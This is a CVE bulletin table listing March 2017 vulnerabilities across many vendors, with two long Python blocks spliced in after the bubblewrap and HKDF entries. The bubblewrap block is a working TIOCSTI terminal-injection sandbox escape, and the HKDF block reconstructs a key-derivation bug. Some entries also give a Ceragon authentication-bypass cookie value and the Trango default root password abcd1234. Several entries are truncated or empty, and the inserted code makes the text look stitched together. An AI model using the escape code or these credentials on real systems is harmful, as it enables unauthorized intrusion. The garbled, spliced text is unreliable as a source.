Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info
adobe -- acrobat_reader
|
Adobe Acrobat Reader versions 15.020.20042 and earlier, 15.006.30244 and earlier, 11.0.18 and earlier have an exploitable memory corruption vulnerability in the rendering engine. Successful exploitation could lead to arbitrary code execution.
|
2017-03-31
|
not yet calculated
| |
adobe -- acrobat_reader
|
Adobe Acrobat Reader versions 15.020.20042 and earlier, 15.006.30244 and earlier, 11.0.18 and earlier have an exploitable buffer overflow vulnerability in the JPEG2000 parser. Successful exploitation could lead to information disclosure.
|
2017-03-31
|
not yet calculated
| |
apache -- ambari
|
Custom commands may be executed on Ambari Agent (2.4.x, before 2.4.2) hosts without authorization, leading to unauthorized access to operations that may affect the underlying system. Such operations are invoked by the Ambari Agent process on Ambari Agent hosts, as the user executing the Ambari Agent process.
|
2017-03-28
|
not yet calculated
| |
apple -- ios
|
An issue was discovered in certain Apple products. iOS before 10.3 is affected. The issue involves the "Phone" component. It allows attackers to trigger telephone calls to arbitrary numbers via a third-party app.
|
2017-04-01
|
not yet calculated
| |
apple -- ios
|
An issue was discovered in certain Apple products. iOS before 10.3 is affected. The issue involves the "iTunes Store" component. It allows man-in-the-middle attackers to modify the client-server data stream to iTunes sandbox web services by leveraging use of cleartext HTTP.
|
2017-04-01
|
not yet calculated
| |
apple -- ios
|
(many more iOS entries; omitted)
|
2017-04-01
|
not yet calculated
| |
apple -- macos
|
An issue was discovered in certain Apple products. macOS before 10.12.4 is affected. The issue involves the "Printing" component. A format-string vulnerability allows remote attackers to execute arbitrary code via a crafted ipp: or ipps: URL.
|
2017-04-01
|
not yet calculated
| |
apple -- macos_server
|
An issue was discovered in certain Apple products. macOS Server before 5.3 is affected. The issue involves the "Wiki Server" component. It allows remote attackers to enumerate user accounts via unspecified vectors.
|
2017-04-01
|
not yet calculated
| |
apple -- macos
|
(about 25 more macOS entries; omitted)
|
2017-04-01
|
not yet calculated
| |
apple -- safari
|
An issue was discovered in certain Apple products. Safari before 10.1 is affected. The issue involves the "Safari Login AutoFill" component. It allows local users to obtain access to locked keychain items via unspecified vectors.
|
2017-04-01
|
not yet calculated
| |
apple -- safari
|
An issue was discovered in certain Apple products. Safari before 10.1 is affected. The issue involves the "WebKit" component. It allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted app.
|
2017-04-01
|
not yet calculated
| |
apple -- software
|
An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. The issue involves the "Kernel" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.
|
2017-04-01
|
not yet calculated
| |
apple -- software
|
An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.
|
2017-04-01
|
not yet calculated
| |
apple -- software
|
An issue was discovered in certain Apple products. iCloud before 6.2 on Windows is affected. iTunes before 12.6 on Windows is affected. The issue involves cleartext client-certificate transmission in the "APNs Server" component. It allows man-in-the-middle attackers to track users via correlation with this certificate.
|
2017-04-01
|
not yet calculated
| |
apple -- software
|
(several dozen more Apple entries of various kinds; omitted)
|
2017-04-01
|
not yet calculated
| |
auromeera -- emli_portal
|
Directory path traversal in the eMLi Portal from AuroMeera Technometrix Pvt. Ltd. allows an attacker to view restricted information or, more seriously, execute commands on the web server, which can lead to full compromise of the system, as demonstrated by reading core-emli/Storage. The affected versions are eMLi School Management 1.0, eMLi College Campus Management 1.0, and eMLi University Management 1.0.
|
2017-03-29
|
not yet calculated
| |
bubblewrap -- bubblewrap
|
When a program is executed via the bubblewrap sandbox, the unprivileged session can escape to the parent session by using the TIOCSTI ioctl to push characters into the terminal's input buffer, allowing an attacker to escape the sandbox.
|
2017-03-29
|
not yet calculated
| |
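The bubblewrap escape above, modelled as an added example (this is neither bubblewrap's code nor the original report's): a "victim" process owns a pseudo-terminal as its controlling tty and spawns a "sandboxed" child that only inherits the terminal descriptor; the child pushes `id\n` into the terminal's input queue with TIOCSTI, and the victim reads it back as if the user had typed it. With `new_session=True` the child first calls `setsid()`, which is what bubblewrap's later `--new-session` option does: TIOCSTI then fails with EPERM because the terminal is no longer the caller's controlling tty. Assumptions: Linux with a working /dev/pts; a process holding CAP_SYS_ADMIN (root) can inject regardless of session, and kernels built without legacy TIOCSTI support (or with `dev.tty.legacy_tiocsti=0`) return EIO, which the helper reports as "unsupported". The payload `id\n` and the status names are constructed for this example.

```python
"""Model of the bubblewrap TIOCSTI sandbox escape and of the setsid() mitigation."""
import errno
import fcntl
import os
import select
import termios


def _sandboxed_program(tty_fd: int, payload: bytes, new_session: bool) -> None:
    """The untrusted program. All it has is an inherited descriptor for the terminal."""
    if new_session:
        os.setsid()  # mitigation: new session, so the tty stops being our controlling tty
    try:
        for ch in payload:  # TIOCSTI pushes one byte per call into the tty input queue
            fcntl.ioctl(tty_fd, termios.TIOCSTI, bytes([ch]))
    except PermissionError:
        os._exit(2)  # EPERM: tty is not our controlling terminal and we lack CAP_SYS_ADMIN
    except OSError as exc:
        os._exit(3 if exc.errno == errno.EIO else 4)  # EIO: legacy TIOCSTI disabled in kernel
    os._exit(0)


def run_sandbox_escape(payload: bytes = b"id\n", new_session: bool = False):
    """Return (status, data): status is 'injected', 'denied', 'unsupported' or 'error';
    data is what the victim session read from its own terminal after the child ran."""
    try:
        master, slave = os.openpty()  # stands in for the user's real terminal
    except OSError:
        return ("unsupported", b"")
    rfd, wfd = os.pipe()  # victim reports back to us over this pipe
    pid = os.fork()
    if pid == 0:
        # Victim: an interactive session whose controlling terminal is the pty slave.
        try:
            os.close(master)
            os.close(rfd)
            os.setsid()
            fcntl.ioctl(slave, termios.TIOCSCTTY, 0)  # adopt the pty as controlling tty
            child = os.fork()
            if child == 0:
                _sandboxed_program(slave, payload, new_session)
            _, status = os.waitpid(child, 0)
            data = b""
            if select.select([slave], [], [], 1.0)[0]:  # did anything get "typed" at us?
                data = os.read(slave, 256)  # canonical mode: returns the injected line
            os.write(wfd, bytes([os.WEXITSTATUS(status)]) + data)
        finally:
            os._exit(0)
    os.close(wfd)
    os.close(slave)
    chunks = []
    while True:
        chunk = os.read(rfd, 4096)
        if not chunk:
            break
        chunks.append(chunk)
    os.close(rfd)
    os.close(master)
    os.waitpid(pid, 0)
    raw = b"".join(chunks)
    if not raw:
        return ("error", b"")
    code, data = raw[0], raw[1:]
    return ({0: "injected", 2: "denied", 3: "unsupported"}.get(code, "error"), data)


def mitigation_check(payload: bytes = b"id\n") -> str:
    """'denied' when setsid() stops the injection; 'not testable' when the kernel refuses
    TIOCSTI outright or we run with CAP_SYS_ADMIN (root injects regardless of session)."""
    if run_sandbox_escape(payload, new_session=False)[0] != "injected" or os.geteuid() == 0:
        return "not testable"
    return run_sandbox_escape(payload, new_session=True)[0]


if __name__ == "__main__":
    print("without new session:", run_sandbox_escape(b"id\n", new_session=False))
    print("with new session:   ", mitigation_check(b"id\n"))
```

The important detail is the kernel's permission check: TIOCSTI is allowed when the tty is the caller's controlling terminal, which an inherited descriptor satisfies until the sandboxed process leaves the session. Dropping the session is necessary but not sufficient for a root-running sandbox, so a sandbox that must survive CAP_SYS_ADMIN should not pass the user's terminal through at all and should allocate a fresh pty instead.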
ceragon -- fibeair
|
In the GUI of Ceragon FibeAir IP-10 (before 7.2.0) devices, a remote attacker can bypass authentication by adding an ALBATROSS cookie with the value 0-4-11 to their browser.
|
2017-03-30
|
not yet calculated
| |
citymont_symetrie -- citymont_symetrie
|
citymont/symetrie v.0.9.6 is vulnerable to a reflected XSS in symetrie-master/app/commands/
|
2017-03-31
|
not yet calculated
| |
dahua -- ip_camera
|
Dahua IP Camera devices 3.200.0001.6 can be exploited via these steps: 1. Use the default low-privilege credentials to list all users via a request to a certain URI. 2. Login to the IP camera with admin credentials so as to obtain full control of the target IP camera. During exploitation, the first JSON object encountered has a "Component error: login challenge!" message. The second JSON object encountered has a result indicating a successful admin login.
|
2017-03-30
|
not yet calculated
| |
emc -- isilon_onefs
|
EMC Isilon OneFS is affected by a path traversal vulnerability that may potentially be exploited by attackers to compromise the affected system. Affected versions are 7.1.0 - 7.1.1.10, 7.2.0 - 7.2.1.3, and 8.0.0 - 8.0.0.1.
|
2017-03-29
|
not yet calculated
| |
emc -- rsa_archer_security_
|
EMC RSA Archer Security Operations Management with RSA Unified Collector Framework versions prior to 1.3.1.52 contain a sensitive information disclosure vulnerability that could potentially be exploited by malicious users to compromise an affected system.
|
2017-03-29
|
not yet calculated
| |
fortinet -- fortigate
|
Long lived sessions in Fortinet FortiGate devices with FortiOS 5.x before 5.4.0 could violate a security policy during IPS signature updates when the FortiGate's IPSengine is configured in flow mode. All FortiGate versions with IPS configured in proxy mode (the default mode) are not affected.
|
2017-03-30
|
not yet calculated
| |
fortinet -- fortios
|
A read-only administrator on Fortinet devices with FortiOS 5.2.x before 5.2.10 GA and 5.4.x before 5.4.2 GA may be able to read the password hashes of read-write administrators (not including super-admins) stored on the appliance via the web UI REST API, and may therefore be able to crack them.
|
2017-03-30
|
not yet calculated
| |
gitlab -- gitlab
|
Multiple versions of GitLab expose a dangerous method to any authenticated user that could lead to the deletion of all Issue and MergeRequest objects on a GitLab instance. For GitLab instances with publicly available projects this vulnerability could be exploited by an unauthenticated user. A fix was included in versions 8.14.3, 8.13.8, and 8.12.11, which were released on December 5th 2016 at 3:59 PST. The GitLab versions vulnerable to this are 8.13.0, 8.13.0-ee, 8.13.1, 8.13.1-ee, 8.13.2, 8.13.2-ee, 8.13.3, 8.13.3-ee, 8.13.4, 8.13.4-ee, 8.13.5, 8.13.5-ee, 8.13.6, 8.13.6-ee, 8.13.7, 8.14.0, 8.14.0-ee, 8.14.1, 8.14.2, and 8.14.2-ee.
|
2017-03-27
|
not yet calculated
| |
gitlab -- gitlab
|
Multiple versions of GitLab expose sensitive user credentials when assigning a user to an issue or merge request. A fix was included in versions 8.15.8, 8.16.7, and 8.17.4, which were released on March 20th 2017 at 23:59 UTC.
|
2017-03-27
|
not yet calculated
| |
hak5 -- wifi-pineapple
|
Hak5 WiFi Pineapple 2.0 through 2.3 uses predictable CSRF tokens.
|
2017-03-31
|
not yet calculated
| |
hkdf -- hkdf
|
HKDF in the Python cryptography library before 1.5.2 returns an empty byte string if used with a length less than algorithm.digest_size.
|
2017-03-27
|
not yet calculated
| |
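To make the HKDF entry concrete, here is an added example (not the cryptography library's code): RFC 5869 extract and expand written against the Python standard library, beside a reconstruction of the kind of loop-bound mistake that yields an empty output for lengths up to HashLen. The shape of that bug is an assumption, since the page gives no code; what it reproduces is the described symptom. The vectors are RFC 5869 Appendix A Test Case 1 (SHA-256), not constructed. The length check in `derive_key` is what a caller should make regardless of which library does the derivation.

```python
"""RFC 5869 HKDF against the standard library, beside a reconstruction of the
short-length bug and the output-length check a caller should make."""
import hashlib
import hmac
import math


def hkdf_extract(salt: bytes, ikm: bytes, hash_name: str = "sha256") -> bytes:
    """PRK = HMAC-Hash(salt, IKM); an empty salt means HashLen zero bytes."""
    if not salt:
        salt = b"\x00" * hashlib.new(hash_name).digest_size
    return hmac.new(salt, ikm, hash_name).digest()


def hkdf_expand(prk: bytes, info: bytes, length: int, hash_name: str = "sha256") -> bytes:
    """OKM = first `length` bytes of T(1) | T(2) | ... with T(i) = HMAC(PRK, T(i-1) | info | i)."""
    digest_size = hashlib.new(hash_name).digest_size
    if not 0 < length <= 255 * digest_size:
        raise ValueError("length must be between 1 and 255*HashLen")
    blocks, t = [], b""
    for counter in range(1, math.ceil(length / digest_size) + 1):
        t = hmac.new(prk, t + info + bytes([counter]), hash_name).digest()
        blocks.append(t)
    return b"".join(blocks)[:length]


def buggy_hkdf_expand(prk: bytes, info: bytes, length: int, hash_name: str = "sha256") -> bytes:
    """Reconstruction (an assumption, not the library's code) of a loop bound that counts
    the seed entry output[0] == b"" as a produced block: for any length up to HashLen the
    loop body never runs and the result is empty; longer requests come back truncated."""
    digest_size = hashlib.new(hash_name).digest_size
    output, counter = [b""], 1
    while digest_size * len(output) < length:  # off by one: len(output) starts at 1
        h = hmac.new(prk, output[-1] + info + bytes([counter]), hash_name)
        output.append(h.digest())
        counter += 1
    return b"".join(output)[:length]


def derive_key(ikm: bytes, salt: bytes, info: bytes, length: int, expand=hkdf_expand) -> bytes:
    """Extract-then-expand with the check every caller should make: a KDF that silently
    returns fewer bytes than requested hands the application an empty or truncated key."""
    okm = expand(hkdf_extract(salt, ikm), info, length)
    if len(okm) != length:
        raise ValueError(f"KDF returned {len(okm)} bytes, expected {length}")
    return okm


def output_has_requested_length(expand, prk: bytes, info: bytes, length: int) -> bool:
    """True when the expand function honours the requested output length."""
    return len(expand(prk, info, length)) == length


# RFC 5869 Appendix A, Test Case 1 (SHA-256): taken from the RFC, not constructed.
RFC5869_TC1 = {
    "ikm": bytes.fromhex("0b" * 22),
    "salt": bytes.fromhex("000102030405060708090a0b0c"),
    "info": bytes.fromhex("f0f1f2f3f4f5f6f7f8f9"),
    "length": 42,
    "prk": "077709362c2e32df0ddc3f0dc47bba6390b6c73bb50f9c3122ec844ad7c2b3e5",
    "okm": "3cb25f25faacd57a90434f64d0362f2a2d2d0a90cf1a5a4c5db02d56ecc4c5bf34007208d5b887185865",
}

if __name__ == "__main__":
    tc = RFC5869_TC1
    prk = hkdf_extract(tc["salt"], tc["ikm"])
    print("PRK matches RFC:", prk.hex() == tc["prk"])
    print("OKM matches RFC:", hkdf_expand(prk, tc["info"], tc["length"]).hex() == tc["okm"])
    print("buggy expand, 16 bytes requested:", buggy_hkdf_expand(prk, tc["info"], 16))
```

A 16-byte request is exactly the case the entry describes (AES-128 keys are 16 bytes, SHA-256 output is 32), and the reconstructed loop returns nothing for it while the RFC version returns the first 16 bytes of the test vector's OKM. Checking `len(okm) == length` at the call site costs nothing and turns a silently empty key into an exception.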
honeywell -- intermec
|
Honeywell Intermec PM23, PM42, PM43, PC23, PC43, PD43, and PC42 industrial printers before 10.11.013310 and 10.12.x before 10.12.013309 have /usr/bin/lua installed setuid to the itadmin account, which allows local users to conduct a BusyBox jailbreak attack and obtain root privileges by overwriting the /etc/shadow file.
|
2017-03-29
|
not yet calculated
| |
ibm -- algorithmics_one-algo_risk_
|
IBM Algorithmics One-Algo Risk Application 4.9.1, 5.0, and 5.1.0 could allow a user to gain access to files in the local environment which should not be viewed by application users. IBM Reference #: 1999892.
|
2017-03-31
|
not yet calculated
| |
ibm -- curam_social_program_manager
|
IBM Curam Social Program Management 6.0 and 7.0 are vulnerable to a denial of service, caused by an XML External Entity Injection (XXE) error when processing XML data. A remote attacker could exploit this vulnerability to expose highly sensitive information or consume all available memory resources. IBM Reference #: 2000833.
|
2017-03-31
|
not yet calculated
| |
ibm -- inotes
|
IBM iNotes 8.5 and 9.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM Reference #: 1998824.
|
2017-03-31
|
not yet calculated
| |
ibm -- jazz_foundation
|
IBM Jazz Foundation is vulnerable to a denial of service, caused by an XML External Entity Injection (XXE) error when processing XML data. A remote attacker could exploit this vulnerability to expose highly sensitive information or consume all available memory resources. IBM Reference #: 2000784.
|
2017-03-31
|
not yet calculated
| |
ibm -- kenexa
|
IBM Kenexa LMS on Cloud 13.1, 13.2, 13.2.2, 13.2.3, 13.2.4 and 14.0.0 are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM Reference #: 1999483.
|
2017-03-31
|
not yet calculated
| |
ibm -- rational_quality_manager
|
IBM Rational Quality Manager (RQM) 4.0, 5.0, and 6.0 are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM Reference #: 2000784.
|
2017-03-31
|
not yet calculated
| |
ibm -- rational_quality_manager
|
IBM Rational Quality Manager 4.0, 5.0, and 6.0 are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM Reference #: 2000784.
|
2017-03-31
|
not yet calculated
| |
ibm -- rational_quality_manager
|
IBM Rational Quality Manager (RQM) 4.0, 5.0, and 6.0 are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM Reference #: 2000784.
|
2017-03-31
|
not yet calculated
| |
ibm -- sterling_order_management
|
IBM Sterling Order Management 9.2 - 9.5 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM Reference #: 2000943.
|
2017-03-31
|
not yet calculated
| |
ibm -- tririga
|
The IBM TRIRIGA Application Platform 3.3, 3.4, and 3.5 contain a vulnerability that could allow an authenticated user to execute Application actions they do not have access to. IBM Reference #: 2001083.
|
2017-03-31
|
not yet calculated
| |
illumos -- illumos
|
illumos smbsrv NULL pointer dereference allows system crash.
|
2017-03-31
|
not yet calculated
| |
illumos -- illumos
|
illumos osnet-incorporation bcopy() and bzero() implementations make signed instead of unsigned comparisons allowing a system crash.
|
2017-03-31
|
not yet calculated
| |
imagemagick -- imagemagick
|
Heap-based buffer overflow in ImageMagick allows remote attackers to have unspecified impact via a crafted xpm file.
|
2017-03-30
|
not yet calculated
| |
imagemagick -- imagemagick
|
(about 20 more ImageMagick entries; omitted)
|
2017-03-30
|
not yet calculated
| |
intel_security -- anti-virus_engine
|
Software Integrity Attacks vulnerability in Intel Security Anti-Virus Engine (AVE) 5200 through 5800 allows local users to bypass local security protection via a crafted input file.
|
2017-03-28
|
not yet calculated
| |
intel_security -- anti-virus_engine
|
Software Integrity Attacks vulnerability in Intel Security Anti-Virus Engine (AVE) 5200 through 5800 allows local attackers to bypass local security protection via a crafted input file.
|
2017-03-31
|
not yet calculated
| |
jensen_of_scandinavia -- air_link
|
Multiple stack buffer overflow vulnerabilities in Jensen of Scandinavia AS Air:Link 3G (AL3G) version 2.23m (Rev. 3), Air:Link 5000AC (AL5000AC) version 1.13, and Air:Link 59300 (AL59300) version 1.04 (Rev. 4) devices allow remote attackers to execute arbitrary code or crash the web service via the (1) ateFunc, (2) ateGain, (3) ateTxCount, (4) ateChan, (5) ateRate, (6) ateMacID, (7) e2pTxPower1, (8) e2pTxPower2, (9) e2pTxPower3, (10) e2pTxPower4, (11) e2pTxPower5, (12) e2pTxPower6, (13) e2pTxPower7, (14) e2pTx2Power1, (15) e2pTx2Power2, (16) e2pTx2Power3, (17) e2pTx2Power4, (18) e2pTx2Power5, (19) e2pTx2Power6, (20) e2pTx2Power7, (21) ateTxFreqOffset, (22) ateMode, (23) ateBW, (24) ateAntenna, (25) e2pTxFreqOffset, (26) e2pTxPwDeltaB, (27) e2pTxPwDeltaG, (28) e2pTxPwDeltaMix, (29) e2pTxPwDeltaN, and (30) readE2P parameters of the /goform/formWlanMP endpoint.
|
2017-03-26
|
not yet calculated
| |
linux -- linux_kernel
|
Blkid in util-linux before 2.26rc-1 allows local users to execute arbitrary code.
|
2017-03-31
|
not yet calculated
| |
linux -- linux_kernel
|
Use-after-free vulnerability in fs/crypto/ in the Linux kernel before 4.10.7 allows local users to cause a denial of service (NULL pointer dereference) or possibly gain privileges by revoking keyring keys being used for ext4, f2fs, or ubifs encryption, causing cryptographic transform objects to be freed prematurely.
|
2017-03-31
|
not yet calculated
| |
linux -- linux_kernel
|

|
2017-03-31
|
not yet calculated
| |
magmi -- magmi
|
A Cross-Site Scripting (XSS) was discovered in 'Magmi 0.7.22'. The vulnerability exists due to insufficient filtration of user-supplied data (prefix) passed to the 'magmi-git-master/magmi/web/
|
2017-03-31
|
not yet calculated
| |
mantisbt -- configuration_report
|
A cross-site scripting (XSS) vulnerability in the MantisBT Configuration Report page (adm_config_report.php) allows remote attackers to inject arbitrary code (if CSP settings permit it) through a crafted 'config_option' parameter. This is fixed in 1.3.9, 2.1.3, and 2.2.3.
|
2017-03-31
|
not yet calculated
| |
mantisbt -- configuration_report
|
A cross-site scripting (XSS) vulnerability in the MantisBT Configuration Report page (adm_config_report.php) allows remote attackers to inject arbitrary code through a crafted 'action' parameter. This is fixed in 1.3.8, 2.1.2, and 2.2.2.
|
2017-03-31
|
not yet calculated
| |
mantisbt -- move_attachments
|
A cross-site scripting (XSS) vulnerability in the MantisBT Move Attachments page (move_attachments_page.php, part of the admin tools) allows remote attackers to inject arbitrary code through a crafted 'type' parameter, if the Content Security Policy (CSP) settings allow it. This is fixed in 1.3.9, 2.1.3, and 2.2.3. Note that this vulnerability is not exploitable if the admin tools directory is removed, as recommended in the "Post-installation and upgrade tasks" section of the MantisBT Admin Guide. A reminder to do so is also displayed on the login page.
|
2017-03-31
|
not yet calculated
| |
mikrotik -- mikrotik
|
A vulnerability in the network stack of MikroTik Version 6.38.5 released 2017-03-09 could allow an unauthenticated remote attacker to exhaust all available CPU via a flood of TCP RST packets, preventing the affected router from accepting new TCP connections.
|
2017-03-29
|
not yet calculated
| |
multi-router_looking_glass -- multi-router_looking_glass
|
fastping.c in MRLG (aka Multi-Router Looking Glass) before 5.5.0 allows remote attackers to cause an arbitrary memory write and memory corruption.
|
2017-03-31
|
not yet calculated
| |
mxit -- mxit
|
The Mxit protocol uses weak encryption when encrypting user passwords, which might allow attackers to (1) decrypt hashed passwords by leveraging knowledge of client registration codes or (2) gain login access by eavesdropping on login messages and re-using the hashed passwords.
|
2017-03-29
|
not yet calculated
| |
nagios -- nagios
|
Cross-site scripting (XSS) vulnerability in Nagios.
|
2017-03-31
|
not yet calculated
| |
national_instruments -- labview_2016
|
An exploitable memory corruption vulnerability exists in the LvVarientUnflatten functionality of LabVIEW 2016 version 16.0.0.49152. A specially crafted VI file can cause a user-controlled value to be used as a loop terminator, resulting in internal heap corruption. An attacker-controlled VI file can be used to trigger this vulnerability, and exploitation could lead to remote code execution.
|
2017-03-31
|
not yet calculated
| |
netiq -- sentinel_server
|
A vulnerability was discovered in NetIQ Sentinel Server 8.0 before 8.0.1 that may allow leakage of information (account enumeration).
|
2017-03-30
|
not yet calculated
| |
netiq -- sentinel_server
|
A vulnerability was discovered in NetIQ Sentinel Server 8.0 before 8.0.1 that may allow remote denial of service.
|
2017-03-30
|
not yet calculated
| |
oci-register-machine -- oci-register-machine
|
The machinectl command in oci-register-machine allows local users to list running containers and possibly obtain sensitive information by running that command.
|
2017-03-29
|
not yet calculated
| |
open-exchange -- appsuite
|
Cross-site scripting (XSS) vulnerability in Open-Xchange (OX) AppSuite backend before 7.6.2-rev59, 7.8.0 before 7.8.0-rev38, 7.8.2 before 7.8.2-rev8; AppSuite frontend before 7.6.2-rev47, 7.8.0 before 7.8.0-rev30, and 7.8.2 before 7.8.2-rev8; Office Web before 7.6.2-rev16, 7.8.0 before 7.8.0-rev10, and 7.8.2 before 7.8.2-rev5; and Documentconverter-API before 7.8.2-rev5 allows remote attackers to inject arbitrary web script or HTML.
Ref:
- Exchange-like open-source groupware "Open-
|
2017-03-29
|
not yet calculated
| |
open_eclass -- open_eclass
|
Multiple Cross-Site Scripting (XSS) were discovered in 'openeclass Release_3.5.4'. The vulnerabilities exist due to insufficient filtration of user-supplied data (meeting_id, user) passed to the 'openeclass-master/modules/tc/
|
2017-03-31
|
not yet calculated
| |
openstack -- glance
|
The image signature algorithm in OpenStack Glance 11.0.0 allows remote attackers to bypass the signature verification process via a crafted image, which triggers an MD5 collision.
|
2017-03-29
|
not yet calculated
| |
pixie -- pixie
|
Pixie 1.0.4 allows an admin/index.php s=login&m= XSS attack.
|
2017-03-31
|
not yet calculated
| |
pixie -- pixie
|
Pixie 1.0.4 allows an admin/index.php s=settings&x= XSS attack.
Pixie 1.0.4 allows an admin/index.php s=publish&m=dynamic&x= XSS attack.
Pixie 1.0.4 allows an admin/index.php s=publish&m=module&x= XSS attack.
Pixie 1.0.4 allows an admin/index.php s=publish&m=static&x= XSS attack.
|
2017-03-31
|
not yet calculated
| |
rancher_labs -- rancher_server
|
Rancher Labs rancher server 1.2.0+ is vulnerable to authenticated users disabling access control via an API call. This is fixed in versions rancher/server:v1.2.4, rancher/server:v1.3.5, rancher/server:v1.4.3, and rancher/server:v1.5.3.
|
2017-03-28
|
not yet calculated
| |
ruby -- ruby
|
DL::dlopen in Ruby 1.8, 1.9.0, 1.9.2, 1.9.3, 2.0.0 before patchlevel 648, and 2.1 before 2.1.8 opens libraries with tainted names.
|
2017-03-29
|
not yet calculated
| |
samsung -- galaxy
|
GALAXY Apps (aka Samsung Apps, Samsung Updates, or com.sec.android.app.
|
2017-03-27
|
not yet calculated
| |
samsung -- samsung_account
|
Samsung Account (AKA com.osp.app.signin) before 1.6.0069 and 2.x before 2.1.0069 allows man-in-the-middle attackers to obtain sensitive information and execute arbitrary code.
|
2017-03-27
|
not yet calculated
| |
siklu -- etherhaul
|
Siklu EtherHaul devices before 7.4.0 contain a remote command execution (RCE) vulnerability that allows a remote attacker, with no authentication, to execute commands and retrieve information such as usernames and plaintext passwords from the device.
|
2017-03-30
|
not yet calculated
| |
siklu -- etherhaul
|
Siklu EtherHaul radios before 3.7.1 and 6.x before 6.9.0 have a built-in, hidden root account, with an unchangeable password that is the same across all devices. This account is accessible via both SSH and the device's web interface and grants access to the underlying embedded Linux OS on the device, allowing full control over it.
|
2017-03-30
|
not yet calculated
| |
snoopy -- snoopy
|
The _httpsrequest function in Snoopy allows remote attackers to execute arbitrary commands. NOTE: this issue exists due to an incomplete fix for CVE-2008-4796.
|
2017-03-31
|
not yet calculated
| |
socialnetwork -- socialnetwork
|
A Cross-Site Scripting (XSS) was discovered in 'SocialNetwork v1.2.1'. The vulnerability exists due to insufficient filtration of user-supplied data (mail) passed to the 'SocialNetwork-andrea/app/
|
2017-03-31
|
not yet calculated
| |
sophos -- sophos_web_appliance
|
In Sophos Web Appliance (SWA) before 4.3.1.2, Session Fixation could occur, aka NSWA-1310.
|
2017-03-30
|
not yet calculated
| |
sophos -- sophos_web_appliance
|
In Sophos Web Appliance (SWA) before 4.3.1.2, a section of the machine's configuration utilities for adding (and detecting) Active Directory servers was vulnerable to remote command injection, aka NSWA-1314.
|
2017-03-30
|
not yet calculated
| |
sophos -- sophos_web_appliance
|
In Sophos Web Appliance (SWA) before 4.3.1.2, a section of the machine's interface responsible for generating reports was vulnerable to remote command injection via functions, aka NSWA-1304.
|
2017-03-30
|
not yet calculated
| |
sophos -- sophos_web_appliance
|
In Sophos Web Appliance (SWA) before 4.3.1.2, a section of the machine's interface responsible for generating reports was vulnerable to remote command injection via the token parameter, aka NSWA-1303.
|
2017-03-30
|
not yet calculated
| |
sync_breeze -- enterprise_client
|
A buffer overflow vulnerability in Import Command in Sync Breeze Enterprise Client 9.5.16, Disk Sorter Enterprise Client 9.5.12, and DiskBoss Enterprise Client 7.8.16 allows attackers to execute arbitrary code via a crafted XML file containing a long name attribute of a classify element.
|
2017-03-29
|
not yet calculated
| |
thefirstquestion_
|
TheFirstQuestion/
|
2017-03-31
|
not yet calculated
| |
tigervnc -- tigervnc
|
In TigerVNC 1.7.1 (SSecurityVeNCrypt.cxx SSecurityVeNCrypt::
|
2017-03-31
|
not yet calculated
| |
tigervnc -- tigervnc
|
In TigerVNC 1.7.1 (VNCSConnectionST.cxx VNCSConnectionST::fence), an authenticated client can cause a double free, leading to denial of service or potentially code execution.
|
2017-03-31
|
not yet calculated
| |
tigervnc -- tigervnc
|
In TigerVNC 1.7.1 (SMsgReader.cxx SMsgReader::readClientCutText)
|
2017-03-31
|
not yet calculated
| |
tigervnc -- tigervnc
|
In TigerVNC 1.7.1 (CConnection.cxx CConnection::CConnection), an unauthenticated client can cause a small memory leak in the server.
|
2017-03-31
|
not yet calculated
| |
tigervnc -- tigervnc
|
In TigerVNC 1.7.1 (SSecurityPlain.cxx SSecurityPlain::processMsg), unauthenticated users can crash the server by sending long usernames.
|
2017-03-31
|
not yet calculated
| |
trango -- altum_ac600
|
Trango Altum AC600 devices have a built-in, hidden root account, with a default password of abcd1234. This account is accessible via SSH and/or TELNET, and grants access to the underlying embedded UNIX OS on the device, allowing full control over it.
|
2017-03-30
|
not yet calculated
| |
trango -- trango
|
Trango Apex <= 2.1.1, ApexLynx < 2.0, ApexOrion < 2.0, ApexPlus <= 3.2.0, Giga <= 2.6.1, GigaLynx < 2.0, GigaOrion < 2.0, GigaPlus <= 3.2.3, GigaPro <= 1.4.1, StrataLink < 3.0, and StrataPro devices have a built-in, hidden root account, with a default password that was once stored in cleartext within a software update package on a Trango FTP server. This account is accessible via SSH and/or TELNET, and grants access to the underlying embedded UNIX OS on the device, allowing full control over it.
|
2017-03-30
|
not yet calculated
| |
trango -- trango
|
Trango ApexLynx 2.0, ApexOrion 2.0, GigaLynx 2.0, GigaOrion 2.0, and StrataLink 3.0 devices have a built-in, hidden root account, with a default password for which the MD5 hash value is public (but the cleartext value is perhaps not yet public). This account is accessible via SSH and/or TELNET, and grants access to the underlying embedded UNIX OS on the device, allowing full control over it.
|
2017-03-30
|
not yet calculated
| |
trend_micro -- enterprise_mobile_security_
|
Missing SSL certificate validation in the Trend Micro Enterprise Mobile Security Android application before 9.7.1193, aka VRTS-398.
|
2017-03-30
|
not yet calculated
| |
ubuntu -- dmcrypt-get-device
|
